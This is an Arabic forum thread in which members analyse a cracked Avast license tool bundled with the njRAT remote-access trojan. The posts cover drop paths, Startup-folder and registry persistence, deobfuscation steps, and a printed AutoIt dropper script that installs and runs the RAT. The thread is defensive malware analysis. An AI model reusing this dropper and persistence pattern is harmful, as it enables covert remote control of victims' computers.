• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

الحالة
مغلق و غير مفتوح للمزيد من الردود.
لماذا اخي عمر لانفك اداة ملغومة Avast License ZeNiX 2014-03-14.exe

[hide]
2222222222222222222222ture.JPG
[/hide]
لأن السيرفر مدمج بالكراك بالاوتوات
اما السيرفر نفسه فهو دوت نت اخى
 

توقيع : White Man
الملف باالاوتوايت ولكن لم تعمل كل الادوات الخاصة بها يبدو انه به تخطيات
++
اخي عمرو الملف يقوم باالحقن في netsh.exe

هذا ماتبين في صورة الاخ dvb2010
 
توقيع : Ahmed_Albosife
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

تم دمج اداة Avast License ZeNiX 2014-03-14 مع سيرفر اختراق njRAT v0.7d

عند فحص ملف ملغوم

[hide]
2222222222222222222222ture.JPG
[/hide]

جربت عدة ادوات لاستخراج سكريبت AutoIt v3

لم استطع لقلة خبرتي

عند تشغيل ملف ملغوم ينسخ سيرفر Avast License.exe في مسارين

[hide]AppData\Local\Temp\Avast License.exe

AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Avast License.exe
[/hide]

يشتغل سيرفر internet.exe مع تاخير Sleep

+ لايوجد تثبيت لهذا سيرفر internet.exe

فحصته حماية IntelliLock v.1.5.x.0

[hide]
d7a4bb01b1264.jpg
[/hide]

لفك هذه حماية استعملت اداة de4dot 3.1.41592 نسخة الاخيرة

بعد بحث وجدت سيرفر في ريسورس مقسم الى اربعة اجزاء

مشفر بخورزمية Base64

[hide]
1aa2c4f8dcf22.jpg
[/hide]

جمعت الاجزاء في ملف txt وحولته الى ملف exe بواسطة اداة Base64 To Exe.exe

نتيجة نهائية تم استخراج بيانات

[hide]
f98c3fc751bf3.jpg


3aa5392753721.jpg
[/hide]
 
توقيع : dvb2010
لأن السيرفر مدمج بالكراك بالاوتوات
اما السيرفر نفسه فهو دوت نت اخى

هل من حل للقضاء على الاوتوايت

.
 
توقيع : dvb2010
الملف باالاوتوايت ولكن لم تعمل كل الادوات الخاصة بها يبدو انه به تخطيات
++
اخي عمرو الملف يقوم باالحقن في netsh.exe

هذا ماتبين في صورة الاخ dvb2010

لايقوم بالحقن اخي

لانه سيرفر دوت نت
 
توقيع : dvb2010
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

تم دمج اداة Avast License ZeNiX 2014-03-14 مع سيرفر اختراق njRAT v0.7d

عند فحص ملف ملغوم

[hide]
2222222222222222222222ture.JPG
[/hide]

جربت عدة ادوات لاستخراج سكريبت AutoIt v3

لم استطع لقلة خبرتي

عند تشغيل ملف ملغوم ينسخ سيرفر Avast License.exe في مسارين

[hide]AppData\Local\Temp\Avast License.exe

AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Avast License.exe
[/hide]

يشتغل سيرفر internet.exe مع تاخير Sleep

+ لايوجد تثبيت لهذا سيرفر internet.exe

فحصته حماية IntelliLock v.1.5.x.0

[hide]
d7a4bb01b1264.jpg
[/hide]

لفك هذه حماية استعملت اداة de4dot 3.1.41592 نسخة الاخيرة

بعد بحث وجدت سيرفر في ريسورس مقسم الى اربعة اجزاء

مشفر بخورزمية Base64

[hide]
1aa2c4f8dcf22.jpg
[/hide]

جمعت الاجزاء في ملف txt وحولته الى ملف exe بواسطة اداة Base64 To Exe.exe

نتيجة نهائية تم استخراج بيانات

[hide]
f98c3fc751bf3.jpg


3aa5392753721.jpg
[/hide]
مشاء الله اخي

تفاصيل رائعة ومفيدة ..والله كل يوم اتعلم منكم انت والاخ عمرو وبقية الاخوة
(y)(y)
 
توقيع : Ahmed_Albosife
:cool:_____افيرا______:cool:

بتشغيل ملف اوفحص مكشوف

وعند تعطيل الحماية قام بمنع اتصال تلقائي قبل عمل السماح:sneaky:

نزول ملف
AppData\Local\Temp\Avast License.exe
C:\Users\tiktoshi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup





1.jpg



2.jpg



3.jpg
 
الملف باالاوتوايت ولكن لم تعمل كل الادوات الخاصة بها يبدو انه به تخطيات
++
اخي عمرو الملف يقوم باالحقن في netsh.exe

هذا ماتبين في صورة الاخ dvb2010

لا , اخى لا يقوم بالحقن
العملية netsh.exe هى المسئولة عن عملية الإتصال


===

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

تم دمج اداة Avast License ZeNiX 2014-03-14 مع سيرفر اختراق njRAT v0.7d

عند فحص ملف ملغوم

[hide]
2222222222222222222222ture.JPG
[/hide]

جربت عدة ادوات لاستخراج سكريبت AutoIt v3

لم استطع لقلة خبرتي

عند تشغيل ملف ملغوم ينسخ سيرفر Avast License.exe في مسارين

[hide]AppData\Local\Temp\Avast License.exe

AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Avast License.exe
[/hide]

يشتغل سيرفر internet.exe مع تاخير Sleep

+ لايوجد تثبيت لهذا سيرفر internet.exe

فحصته حماية IntelliLock v.1.5.x.0

[hide]
d7a4bb01b1264.jpg
[/hide]

لفك هذه حماية استعملت اداة de4dot 3.1.41592 نسخة الاخيرة

بعد بحث وجدت سيرفر في ريسورس مقسم الى اربعة اجزاء

مشفر بخورزمية Base64

[hide]
1aa2c4f8dcf22.jpg
[/hide]

جمعت الاجزاء في ملف txt وحولته الى ملف exe بواسطة اداة Base64 To Exe.exe

نتيجة نهائية تم استخراج بيانات

[hide]
f98c3fc751bf3.jpg


3aa5392753721.jpg
[/hide]

(y)(y)(y)(y)
ممتاز جداً
لكن السيرفر يقوم بتثبيت نفسه من خلال الريجسترى بإضافة مفتاحين
ستجد احداهما من خلال فكك للملف لو دققت قليلاً

===

ممتاز جدااً
أداء مميز هذه المرة ووصول للبيانات بشكل سريع عن المرة السابقة ;)
 
توقيع : White Man
هناك عضو اخر وضع ملف ملغوم جديد .. اقوم بنقله الأن ام نتظر قليلاً ؟
 
توقيع : White Man
توقيع : dvb2010
نعم اخي عمر
افضل ان يبقى الموضوع قليلاً ريثما يتم الإنتهاء من هذا
لكن لو فى اجماع على نقل الموضوع ,, سأقوم بنقله
;)
 
توقيع : White Man
الملف باالاوتوايت ولكن لم تعمل كل الادوات الخاصة بها يبدو انه به تخطيات
++
اخي عمرو الملف يقوم باالحقن في netsh.exe

هذا ماتبين في صورة الاخ dvb2010

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

تم دمج اداة Avast License ZeNiX 2014-03-14 مع سيرفر اختراق njRAT v0.7d

عند فحص ملف ملغوم

[hide]
2222222222222222222222ture.JPG
[/hide]

جربت عدة ادوات لاستخراج سكريبت AutoIt v3

لم استطع لقلة خبرتي

عند تشغيل ملف ملغوم ينسخ سيرفر Avast License.exe في مسارين

[hide]AppData\Local\Temp\Avast License.exe

AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Avast License.exe
[/hide]

يشتغل سيرفر internet.exe مع تاخير Sleep

+ لايوجد تثبيت لهذا سيرفر internet.exe

فحصته حماية IntelliLock v.1.5.x.0

[hide]
d7a4bb01b1264.jpg
[/hide]

لفك هذه حماية استعملت اداة de4dot 3.1.41592 نسخة الاخيرة

بعد بحث وجدت سيرفر في ريسورس مقسم الى اربعة اجزاء

مشفر بخورزمية Base64

[hide]
1aa2c4f8dcf22.jpg
[/hide]

جمعت الاجزاء في ملف txt وحولته الى ملف exe بواسطة اداة Base64 To Exe.exe

نتيجة نهائية تم استخراج بيانات

[hide]
f98c3fc751bf3.jpg


3aa5392753721.jpg
[/hide]

هل من حل للقضاء على الاوتوايت

.
بالنسبة للأوتو ات .. يمكن فكه بكل سهولة من خلال اداة exe2aut

[hide]
كود:
#RequireAdmin
#NoTrayIcon
FileInstall(Avast License.exe, @TempDir & Avast License.exe)
FileInstall(Avast License ZeNiX 2014-03-14.exe, @TempDir & Avast License ZeNiX 2014-03-14.exe)
Run(@TempDir & Avast License.exe)
Run(@TempDir & Avast License ZeNiX 2014-03-14.exe)
FileCopy(@TempDir & Avast License.exe, @StartupDir & Avast License.exe)
[/hide]

شرح الأكواد ..
طلب صلاحيات المسئول واخفاء ظهور الايقونة من شريط المهام
نسخ السيرفر والكراك النظيف الى التمب وتشغيلهما
ثم نسخ السيرفر الى مجلد الـ Startup
 
توقيع : White Man
هذه الاداة لم تنجح معي في الفك اخي عمرو
exe2aut
والا لكان الامر سهل
 
توقيع : Ahmed_Albosife
بالنسبة للأوتو ات .. يمكن فكه بكل سهولة من خلال اداة exe2aut

[hide]
كود:
#RequireAdmin
#NoTrayIcon
FileInstall(Avast License.exe, @TempDir & Avast License.exe)
FileInstall(Avast License ZeNiX 2014-03-14.exe, @TempDir & Avast License ZeNiX 2014-03-14.exe)
Run(@TempDir & Avast License.exe)
Run(@TempDir & Avast License ZeNiX 2014-03-14.exe)
FileCopy(@TempDir & Avast License.exe, @StartupDir & Avast License.exe)
[/hide]

شرح الأكواد ..
طلب صلاحيات المسئول واخفاء ظهور الايقونة من شريط المهام
نسخ السيرفر والكراك النظيف الى التمب وتشغيلهما
ثم نسخ السيرفر الى مجلد الـ Startup

مشكل لماذا لم تشتغل اداة Avast License ZeNiX 2014-03-14.exe

هذه الاداة لم تنجح معي في الفك اخي عمرو
exe2aut
والا لكان الامر سهل

نفس المشكلة

.
 
توقيع : dvb2010
هذه الاداة لم تنجح معي في الفك اخي عمرو
exe2aut
والا لكان الامر سهل
مشكل لماذا لم تشتغل اداة Avast License ZeNiX 2014-03-14.exe



نفس المشكلة

.
الأداة لن تقوم بفك الملفات المدمجة اخوانى
فقط ستُظهر الأكواد ..


[hide]
10.png

[/hide]
 
توقيع : White Man
الأداة لن تقوم بفك الملفات المدمجة اخوانى
فقط ستُظهر الأكواد ..


[hide]مشاهدة المرفق 79827
[/hide]

هل مشكل من اداة التي استعملها

[hide]
11111111111111111111ure.JPG
[/hide]

اذا ممكن ترفع لنا الاداة التي استعملتها

هل يوجد حل لفك ضغط واستخراج ملفين (Avast License ZeNiX 2014-03-14.exe+Avast License.exe) دون تشغيل ملف ملغم

.
 
توقيع : dvb2010
هل مشكل من اداة التي استعملها

[hide]
11111111111111111111ure.JPG
[/hide]

اذا ممكن ترفع لنا الاداة التي استعملتها

هل يوجد حل لفك ضغط واستخراج ملفين (Avast License ZeNiX 2014-03-14.exe+Avast License.exe) دون تشغيل ملف ملغم

.
الأداة فى المرفقات الاصدار الاخير اخى (نفس التى رفعها الدكتور فتحى من قبل)
+
قم بسحب الملف Avast License ZeNiX 2014-03-14.exe وافلاته على الأداة
(هذا هو الكراك الملغوم بعد الدمج)
 

المرفقات

توقيع : White Man
الأداة فى المرفقات الاصدار الاخير اخى (نفس التى رفعها الدكتور فتحى من قبل)
+
قم بسحب الملف Avast License ZeNiX 2014-03-14.exe وافلاته على الأداة
(هذا هو الكراك الملغوم بعد الدمج)

بارك الله فيك اخي عمر على الاداة

لكن لم افهم مازالت مشكلة

[hide]
44444444444444444.JPG
[/hide]
 
توقيع : dvb2010
بارك الله فيك اخي عمر على الاداة

لكن لم افهم مازالت مشكلة

[hide]
44444444444444444.JPG
[/hide]
هل هناك برنامج حماية يعمل اخى ؟
 
توقيع : White Man
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى